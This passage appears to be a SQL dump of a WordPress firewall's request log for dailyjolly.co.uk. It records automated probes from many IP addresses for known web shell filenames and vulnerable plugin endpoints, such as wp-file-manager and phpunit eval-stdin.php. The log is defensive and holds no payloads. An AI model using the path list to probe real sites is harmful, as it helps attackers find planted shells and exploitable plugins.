'',0,1674797863.6989,55,'1tmUN4T7fEJblChXnOQk9cSs','','19|0|0|0|www.dailyjolly.co.uk/style.php',0,19,0),('20.125.141.130',343772546,'',0,1674797865.3321,55,'W9sZ531Y4JNVne8gbxmPCIaL','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.125.141.130',343772546,'',0,1674797869.9159,55,'ab0ErelMftFiXoks463gWNR8','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.125.141.130',343772546,'',0,1674797871.7579,55,'mnr5VQjHUChzJuGSoaWAIyiO','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('20.125.141.130',343772546,'',0,1674797876.5699,55,'ZhN4AnvKJSf3XW9P7UxLcq1Y','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.125.141.130',343772546,'',0,1674797879.6187,55,'nXjkmNvuZYJFMe0B4oKPObyS','','19|0|0|0|www.dailyjolly.co.uk/legion.php',0,19,0),('20.125.141.130',343772546,'',0,1674797880.6572,55,'OCT1uEvLR7rb6tegxj3ZkodH','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('20.125.141.130',343772546,'',0,1674797881.7423,55,'mLRNQtxW9g3esyJ7ToavcdUf','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('20.125.141.130',343772546,'',0,1674797882.8083,55,'UqMLF06PZTIz5Nk7JCfRygEr','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.125.141.130',343772546,'',0,1674797884.9867,55,'1i0CkGbgP6KyuH9wNceU7R3p','','19|0|0|0|www.dailyjolly.co.uk/wp-text/export.php',0,19,0),('20.125.141.130',343772546,'',0,1674797887.2106,55,'7c9efb0Sz4At6yBLIvi1JgZl','','19|0|0|0|www.dailyjolly.co.uk/plugins/ubh/up.php',0,19,0),('20.125.141.130',343772546,'',0,1674797888.1802,55,'8FJz5mCvH4pjtdOPST1f0xrl','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('20.125.141.130',343772546,'',0,1674797889.9334,55,'Vcp4hbjR1o9KyQS3rTIGZkHA','','19|0|0|0|www.dailyjolly.co.uk/wp-text/fw.php',0,19,0),('20.125.141.130',343772546,'',0,1674797890.8109,55,'NziOqQtL4TCY9SGW5AldZxr7','','19|0|0|0|www.dailyjolly.co.uk/tuco.php',0,19,0),('20.125.141.130',343772546,'',0,1674797891.6569,55,'qXwPAQpU46Sc7JoZWLM0Iy2l','','19|0|0|0|www.dailyjolly.co.uk/l.php',0,19,0),('20.125.141.130',343772546,'',0,1674797892.6058,55,'kn3ZXIANmdUOxY615BFWrfeK','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.125.141.130',343772546,'',0,1674797893.7751,55,'DirtfSxYv2FO6ReMhqEGbl5I','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('20.125.141.130',343772546,'',0,1674797894.6893,55,'HzBYtEvbumiqRrTyWdjMNnF9','','19|0|0|0|www.dailyjolly.co.uk/shl.php',0,19,0),('20.125.141.130',343772546,'',0,1674797895.6742,55,'8lgqKjJZ6Q9Uh5NGLAp1oc2I','','19|0|0|0|www.dailyjolly.co.uk/old-index.php',0,19,0),('20.125.141.130',343772546,'',0,1674797896.4838,55,'ba3NJijR0lKSXGPCZwxBAHOt','','19|0|0|0|www.dailyjolly.co.uk/f.php',0,19,0),('20.125.141.130',343772546,'',0,1674797898.5051,55,'4BXpzrdRsSb2qcDxgaJZ8Vyw','','19|0|0|0|www.dailyjolly.co.uk/wsanon.php',0,19,0),('20.125.141.130',343772546,'',0,1674797899.7696,55,'Y5A8ZDOPENUqWLC67ulpdegc','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('20.125.141.130',343772546,'',0,1674797900.8308,55,'w0yRs57JhfOiqvPMZGLAUoVl','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('20.125.141.130',343772546,'',0,1674797901.7227,55,'i0pWqXHUd9n52Q6tkwAJeacK','','19|0|0|0|www.dailyjolly.co.uk/ww.php',0,19,0),('20.125.141.130',343772546,'',0,1674797902.7648,55,'v2ojyfcnVkQlYxa1Ee0tbhWS','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('20.125.141.130',343772546,'',0,1674797907.1056,55,'EJxLtcZz8KrheQM56wAjy1qG','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/dev.php',0,19,0),('20.125.141.130',343772546,'',0,1674797908.5297,100,'cmFMydpgXUixGCKIhvsLSrW4','','13|0|0|0|www.dailyjolly.co.uk/wp-text/themes/seotheme/db.php',0,13,0),('20.125.141.130',343772546,'',0,1674797909.6632,55,'IpvYURKeD5CMWncxrX8mJo37','','19|0|0|0|www.dailyjolly.co.uk/wp/about.php',0,19,0),('20.125.141.130',343772546,'',0,1674797910.5374,55,'f0pCRgBqoQi9DLNOwyG8jSMA','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('20.125.141.130',343772546,'',0,1674797911.8758,55,'28NqkbiHnVQB3cuZ0DxUIwyE','','19|0|0|0|www.dailyjolly.co.uk/gly.php',0,19,0),('20.125.141.130',343772546,'',0,1674797913.3768,55,'UvaGQ2cuS8Pg9d0A5xmz7wf6','','19|0|0|0|www.dailyjolly.co.uk/ahg.php',0,19,0),('20.125.141.130',343772546,'',0,1674797915.7394,55,'8voHBd2aAUer5RfbNMkKTFs3','','19|0|0|0|www.dailyjolly.co.uk/wp-loqin.php',0,19,0),('20.125.141.130',343772546,'',0,1674797919.7847,55,'uYvHqBa0WdnPIt6hZFbl1xLN','','19|0|0|0|www.dailyjolly.co.uk/123.php',0,19,0),('20.125.141.130',343772546,'',0,1674797921.9423,55,'k8zp6tqPxUAX71CmVofN9Wi3','','19|0|0|0|www.dailyjolly.co.uk/wp-confiq.php',0,19,0),('20.125.141.130',343772546,'',0,1674797922.9813,55,'6q0ykJjv7PsbH5WImLdpweMn','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('20.125.141.130',343772546,'',0,1674797924.8495,55,'0TGoQyhOvEr1Cc4NMLj8gUiI','','19|0|0|0|www.dailyjolly.co.uk/xmrlpc.php',0,19,0),('20.125.141.130',343772546,'',0,1674797926.3730,55,'c4n7GzMQBEyOvhtXAZHf5pPW','','19|0|0|0|www.dailyjolly.co.uk/phpinfo.php',0,19,0),('20.125.141.130',343772546,'',0,1674797927.6640,55,'3roG5029SbUOIRYiJeT7lHNx','','19|0|0|0|www.dailyjolly.co.uk/wp-class.php',0,19,0),('20.125.141.130',343772546,'',0,1674797928.6199,55,'84IrfEZq6UcFChoeJdLjizDx','','19|0|0|0|www.dailyjolly.co.uk/configs.php',0,19,0),('20.125.141.130',343772546,'',0,1674797947.5778,55,'9O5w7ZNxncXmDJP0udfFrYHv','','19|0|0|0|www.dailyjolly.co.uk/wp-class.phtml',0,19,0),('20.125.141.130',343772546,'',0,1674797950.4863,55,'sBFOY4LUxiRv2ehalgy7k0P8','','19|0|0|0|www.dailyjolly.co.uk/about.phtml',0,19,0),('20.125.141.130',343772546,'',0,1674797953.0616,55,'Ky5jVwJQSmpLuv96eIqHTM12','','19|0|0|0|www.dailyjolly.co.uk/xd.php',0,19,0),('20.125.141.130',343772546,'',0,1674797956.7351,55,'jp5kvV9rAIJhEdw4uQi0YfbO','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('20.125.141.130',343772546,'',0,1674797959.9431,55,'GQH7v1Kl0LRYVw3XTo89zSqb','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/links.php',0,19,0),('20.125.141.130',343772546,'',0,1674797962.0082,55,'2RkmwSlGs3i68gfpJvTc5AuE','','19|0|0|0|www.dailyjolly.co.uk/hd.php',0,19,0),('20.125.141.130',343772546,'',0,1674797972.7125,55,'znpuhelBNZotJ2R1GTvUi6Fd','','19|0|0|0|www.dailyjolly.co.uk/wp-rss.php',0,19,0),('20.125.141.130',343772546,'',0,1674797982.0909,55,'jt78I2bPJAGzdZpvLh65gS1q','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.125.141.130',343772546,'',0,1674797983.0512,55,'pHG7fTlE5CLoMvZsV1S43Nqc','','19|0|0|0|www.dailyjolly.co.uk/fuk.php',0,19,0),('20.125.141.130',343772546,'',0,1674797986.0891,55,'uEqnY6IACdo0Lv8zOTmcr5te','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/IXR/db.php',0,19,0),('20.125.141.130',343772546,'',0,1674797987.6716,55,'YRrOw0AqcjeFUWuVZ94NtGy7','','19|0|0|0|www.dailyjolly.co.uk/seomarket.php',0,19,0),('20.125.141.130',343772546,'',0,1674797988.5349,55,'m9LWyX2xjnJvQzYkAGdh5CP1','','19|0|0|0|www.dailyjolly.co.uk/spamtools.be.txt.php',0,19,0),('20.125.141.130',343772546,'',0,1674797989.7514,55,'42lZwGPvXxoSBnqYVzheK1NO','','19|0|0|0|www.dailyjolly.co.uk/wp-text/themes/twentyfifteen/404.php',0,19,0),('20.125.141.130',343772546,'',0,1674797992.4211,100,'45NpBofcbweqx73hjmrJWSPX','','13|0|0|0|www.dailyjolly.co.uk/request.php',0,13,0),('20.125.141.130',343772546,'',0,1674797993.4282,55,'43yqEKoCMpxDF75hRbOs6VcA','','19|0|0|0|www.dailyjolly.co.uk/wp-text/plugins/jmb/edit-site.php',0,19,0),('20.125.141.130',343772546,'',0,1674797994.3685,55,'LjAK6ynCkQqsGdi8RFxZfbM0','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('20.125.141.130',343772546,'',0,1674797995.3487,55,'ZydrBYfKxelMGCapE7HcNk3Q','','19|0|0|0|www.dailyjolly.co.uk/wp-text/themes/deep/local.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812767.1691,100,'x24tADUkYH5Qic9drXGFLWnR','','23|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,23,0),('185.65.134.167',3108079271,'',0,1674812767.1899,55,'oCGEjcnrikT4vqUFJsV72dPY','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812767.2189,10,'x24tADUkYH5Qic9drXGFLWnR','','709|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,709,0),('185.65.134.167',3108079271,'',0,1674812767.7241,18,'TCEaU2lLzAG1bnoM3NIYmJ4K','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-json/am-member/license',0,13,0),('185.65.134.167',3108079271,'',0,1674812767.7532,18,'uGe7qLI5HYpUfmXt8cnFxrS1','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812768.4518,100,'v2AgPraFtcyMjZSoIuKLiQYq','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/index.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812768.4564,18,'q2Dkc3I4CTHKUvgtyZQabmhE','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,13,0),('185.65.134.167',3108079271,'',0,1674812769.0128,100,'EjkJ58fuCWmzTHPY93a46gyX','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812769.2541,100,'f8w14YrIEcJdHhRsNSB2WkqV','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,13,0),('185.65.134.167',3108079271,'',0,1674812769.3055,50,'pmoyjXWLgnePKEVwz43H0aq6','','10|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-login.php',0,10,0),('185.65.134.167',3108079271,'',0,1674812769.3174,18,'pmoyjXWLgnePKEVwz43H0aq6','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-login.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812769.3314,55,'doFV6U29AvqIWwzC3mcf8uyp','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812769.5781,18,'QrY8ULecRAK4kX1oGTIqwhdW','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,13,0),('185.65.134.167',3108079271,'',0,1674812769.6468,55,'vH5rUbyewpmtZIoSXjYkifP3','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/uploads/html2wp/2Ku7kikam14K7gl4bhAGGufbaqO.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812769.7232,55,'EcQxYTorFeMNf6gDBUqaX1ik','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812769.7470,18,'cd5zWQbKRPvmlhU2XGtnsSek','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812769.9244,55,'80JtUgMvTuxYmP5QA1CDRarp','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/index.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812770.1417,100,'rR4yVnCW89UNGsQmhgL6Atbv','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/index.php/video',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.1460,18,'zCIM7QBnhFYg98cVZ0f36ryS','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.1704,100,'shIQytK6CrEDw8aGVmJXcf4j','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.3484,55,'8BTLvxcsHKF40R3qYENWIuU5','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wpcargo/includes/2Ku7jgOFrto5l0xaiP8TRgaYMaX.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812770.3876,18,'0IZOA93nx2lTdg1GHbptQeuV','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.4135,18,'qZW9UeYz7a2xslApohD8bPyd','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.5566,100,'3YUdpmMXnzR42WJQyuSGsPIc','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.6054,18,'9GHMTavBq4UdKptFDA1CxYJf','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/simple-file-list/ee-file-engine.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.6646,18,'1hzFG46xstiUbo7I23rJTXnv','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.7556,55,'e3n0ubIMPCfdaiSmycT4Blwz','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812770.8789,100,'hDgpJUaReVoXtAlwsZW12Qcf','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-post.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.8859,18,'pJ3mCA4Hb8RSk9eEYi5wonyX','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wp-payeezy-pay/donate.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.9038,18,'YiUt3JvzoLhErGk9PMX1lKBx','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812770.9420,55,'5hadSmt8XoYNLljiT6sqB3wf','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/uploads/workreap-temp/2Ku7kjV6ASJLEBny2yxu9YL776S.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812771.0602,100,'iVGPtT5SB3JqLfCwRW7ouZpg','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wpcargo/includes/barcode.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812771.0655,55,'hGBefVL68C1R42SEYZHoXUda','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/imagements/images/2ku7keawec0uacjr9yzike6zwyc.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812771.0901,55,'sMmE7tSKiVIRrUkALFPgfB2T','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/uploads/simple-file-list/nuclei.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812771.4124,18,'RuTlaksIiMYHn5XtvJqDBUW6','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812771.5415,55,'a1wB5keq7gyrh3liofndcVYu','','19|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/uploads/kaswara/fonts_icon/syvwmp/zz.php',0,19,0),('185.65.134.167',3108079271,'',0,1674812771.5431,18,'cG8VT49h7WQgnHq1pmvylPAC','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wpcargo/includes/2Ku7jgOFrto5l0xaiP8TRgaYMaX.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812772.1798,18,'fRuxlS4Z7MTpv1D0wi58FW2e','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812772.1806,100,'InkQx0y4VAJoqaOMN5Yp8lHS','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/',0,13,0),('185.65.134.167',3108079271,'',0,1674812772.2030,100,'hudeBUaHrOKpRZ8fGQo9wAq7','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php',0,13,0),('185.65.134.167',3108079271,'',0,1674812772.2036,18,'sB2VuQy30F47xGMroHdJbEqT','','13|0|0|0|www.dailyjolly.co.uk/favicon.ico/wp-json/visualizer/v1/upload-data',0,13,0),('176.111.173.153',2960108953,'',0,1674819849.2073,55,'2Q9VzFyMWTGH1bZdNY6J5hno','','19|0|0|0|dailyjolly.co.uk/wp-plain.php',0,19,0),('176.111.173.153',2960108953,'',0,1674819849.4325,55,'6JvRUrQmh5GwZ0aLP1fBxkNl','','19|0|0|0|dailyjolly.co.uk/qcjcmwmo.php',0,19,0),('158.69.23.79',2655328079,'',0,1674834672.1060,55,'FH5nJ1RQpMKPvDO4yGCYjWcV','','19|0|0|0|dailyjolly.co.uk/assets/images/images.php',0,19,0),('158.69.23.79',2655328079,'',0,1674834673.5658,55,'CPOUnxZBckJdH4wD6iI51VTj','','19|0|0|0|dailyjolly.co.uk/well-known/acme-challenge/a/a/a/a/a.php',0,19,0),('158.69.23.79',2655328079,'',0,1674834674.2702,55,'tsvHq8eC65KT1rQc3kJOEXxp','','19|0|0|0|dailyjolly.co.uk/nc_assets/img/featured/600/600.php',0,19,0),('158.69.23.79',2655328079,'',0,1674834675.0559,55,'PzmncUahNtYAXMVrHILkove2','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/colors/colors.php',0,19,0),('158.69.23.79',2655328079,'',0,1674834675.8369,55,'AQWqDJkro5UFRe8CjtGhY6SH','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-includes.php',0,19,0),('158.69.23.79',2655328079,'',0,1674834675.8623,10,'AQWqDJkro5UFRe8CjtGhY6SH','','707|0|0|0|dailyjolly.co.uk/wp-includes/wp-includes.php',0,707,0),('158.69.23.79',2655328079,'',0,1674834676.6678,100,'n7URbfgxWSsMCFPuk9j8HiBw','','13|0|0|0|dailyjolly.co.uk/cgi-bin/cgi-bin.php',0,13,0),('158.69.23.79',2655328079,'',0,1674834677.4334,100,'EvsUiNe34gyuRmSPVF6GLkKz','','13|0|0|0|dailyjolly.co.uk/wp-content/wp-content.php',0,13,0),('158.69.23.79',2655328079,'',0,1674834678.2382,100,'jZB8gcGMCf1U6EKqdFbvOW23','','13|0|0|0|dailyjolly.co.uk/wp-admin/wp-admin.php',0,13,0),('104.243.43.39',1760766759,'',0,1674842693.5599,55,'03klUNRHqxwaJ1mnpWOF9eBb','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('104.243.43.39',1760766759,'',0,1674842693.9093,55,'4et2sHunMS8UFpJcbG9vzlEX','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('104.243.43.39',1760766759,'',0,1674842694.2456,55,'thZjcalve61g2LfuCyGdBsQK','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('190.220.137.82',3202124114,'',0,1674873878.0299,55,'bEtQDeMZWxvodJ628Gq1lRIf','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('190.220.137.82',3202124114,'',0,1674873879.1842,55,'LQNlskqeI19SD5bCpOuv7WtJ','','19|0|0|0|www.dailyjolly.co.uk/wp-setups.php',0,19,0),('190.220.137.82',3202124114,'',0,1674873880.1917,55,'UgmEqMSQVXyh2dLaOI9tY8si','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('190.220.137.82',3202124114,'',0,1674873881.1677,55,'0xKfHS6dhkTjAbOieFswMzcl','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('190.220.137.82',3202124114,'',0,1674873882.1619,55,'x2mgHoQL1qsY8dSEnjWMDcCO','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('190.220.137.82',3202124114,'',0,1674873882.2168,10,'x2mgHoQL1qsY8dSEnjWMDcCO','','707|0|0|0|www.dailyjolly.co.uk/admin.php',0,707,0),('190.220.137.82',3202124114,'',0,1674873883.1879,18,'W4y9qGsmDaYdSf67oB350vRh','','13|0|0|0|www.dailyjolly.co.uk/admin.php',0,13,0),('190.220.137.82',3202124114,'',0,1674873884.1324,100,'LIswjruh1Ba0tiTo3CUJd6NX','','13|0|0|0|www.dailyjolly.co.uk/wp-story.php',0,13,0),('190.220.137.82',3202124114,'',0,1674873885.1025,18,'kpyfJmOE71h9QLdzlVaARI20','','13|0|0|0|www.dailyjolly.co.uk/wp-story.php',0,13,0),('190.220.137.82',3202124114,'',0,1674873886.0840,100,'qBYVnyl4u1MW5fTvwCONc3Ia','','13|0|0|0|www.dailyjolly.co.uk/123.php',0,13,0),('190.220.137.82',3202124114,'',0,1674873887.0873,55,'mIULC403QxbuzpYcSgaktAPd','','19|0|0|0|www.dailyjolly.co.uk/nf_tracking.php',0,19,0),('207.204.249.63',3486316863,'',0,1674875825.5851,55,'R6eqhW7CXBEOVUfg9ZdFc2MD','','19|0|0|0|dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('20.231.18.49',350687793,'',0,1674879543.6975,55,'Oj9Fvx5LYkUlICQJhtsMdGHy','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.231.18.49',350687793,'',0,1674879544.4212,55,'BmkLQJr6N2bvUGIlM0YnKxyH','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('20.231.18.49',350687793,'',0,1674879545.7492,55,'AdH0syXwLVlaoSPYug8WcIG5','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('20.231.18.49',350687793,'',0,1674879546.3998,55,'2SU1xFAgJYObDXeRjKu48a9P','','19|0|0|0|www.dailyjolly.co.uk/wp-content/mu-plugins-old/index.php',0,19,0),('20.231.18.49',350687793,'',0,1674879553.5627,55,'qCJSgsPFZKmvN7r4Qk6plEhM','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('20.231.18.49',350687793,'',0,1674879553.5946,10,'qCJSgsPFZKmvN7r4Qk6plEhM','','707|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,707,0),('20.231.18.49',350687793,'',0,1674879554.2727,55,'AB6hVHvj8UuidzJCpMfkKYWm','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('20.231.18.49',350687793,'',0,1674879559.7998,55,'C1GrD5JaHZV0FBEkqxUut6Kf','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('20.231.18.49',350687793,'',0,1674879560.2677,55,'Z2VGh0y7uFNCM1kdSmDwAOqs','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('20.231.18.49',350687793,'',0,1674879561.8568,55,'uQ8Pa6zcwMdyTF4JRvjqWxNU','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('20.231.18.49',350687793,'',0,1674879562.6371,55,'FC4EnNS0i3bY8spVgwAOLzcq','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('20.231.18.49',350687793,'',0,1674879563.0333,55,'joX5rFYb4tRN31qpDSUynmHl','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.231.18.49',350687793,'',0,1674879563.7143,55,'01WBlPSHsFX8ZJzvyURAYpba','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.231.18.49',350687793,'',0,1674879565.3232,55,'kS43Uh05KvBtLpIabHsofCZz','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('20.231.18.49',350687793,'',0,1674879570.6475,100,'2K6xzXQ8tJG15Ycw0qiWpBUL','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.231.18.49',350687793,'',0,1674879573.5471,55,'7LMHN95i0SIJOCZtkVRQoes4','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('20.231.18.49',350687793,'',0,1674879574.9429,55,'EMBh48S5znY2yklervOCUg6m','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('185.225.74.248',3118549752,'',0,1674888662.2235,55,'PZ1eOyHnECudv3gf0kbM4JLt','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('185.225.74.248',3118549752,'',0,1674888662.5809,55,'V84YxESzrJGtqhyaXkBCnv1P','','19|0|0|0|dailyjolly.co.uk/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',0,19,0),('185.225.74.248',3118549752,'',0,1674888662.9153,55,'ga8SxhGKCcweP9kzM2qIJnb6','','19|0|0|0|dailyjolly.co.uk/modules/mod_araticlws/mod_araticlws.php',0,19,0),('13.90.41.180',224012724,'',0,1674890042.8504,55,'bYTkou1JnD8Sg3CPNLMaAljB','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('13.90.41.180',224012724,'',0,1674890090.1258,55,'QakEnv6AcSmbChMYKZW40JwF','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('13.90.41.180',224012724,'',0,1674890114.1389,55,'H3g1yB76hQtaEYNFXb2jDCVu','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('13.90.41.180',224012724,'',0,1674890296.9800,55,'FBc5AXuV1edLozq2b9ywPkHp','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('13.90.41.180',224012724,'',0,1674890297.3314,55,'6RX3KN4fsZxpheQrWyPVA5gY','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('13.90.41.180',224012724,'',0,1674890297.3578,10,'6RX3KN4fsZxpheQrWyPVA5gY','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('13.90.41.180',224012724,'',0,1674890461.5109,55,'ErwyaDfWGZ7LK2gdq5VsptTY','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('13.90.41.180',224012724,'',0,1674890475.0795,55,'X0k9ya834ZIE7WwGYfJMjnuB','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('13.90.41.180',224012724,'',0,1674890475.5124,55,'IbDosatXShvAr0JeQjlczMBT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('13.90.41.180',224012724,'',0,1674890506.6480,55,'tERmGgMATCJdFbscYZS2OLNU','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('13.90.41.180',224012724,'',0,1674890526.9583,55,'yDlWdJGaIfRiv1509LFSCgwt','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('13.90.41.180',224012724,'',0,1674890899.1638,100,'bnEhWMdiXQY3UaKIfvNoVmPr','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('13.90.41.180',224012724,'',0,1674891155.2811,55,'V6LJZbHcuXMkfEsawvGjn2qF','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('13.90.41.180',224012724,'',0,1674891162.6596,55,'WUB4FHxSZAmEikae7XgnzThu','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('147.78.47.249',2471374841,'',0,1674908167.5784,55,'T21QDHOANcf4KVWvbqEotXji','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('154.246.120.10',2599843850,'',0,1674918894.0782,55,'YETivbLXtaj9Z6s4HRfG8h7A','','19|0|0|0|www.dailyjolly.co.uk/filemanager/dialog.php',0,19,0),('154.246.120.10',2599843850,'',0,1674918895.1191,55,'sydcHx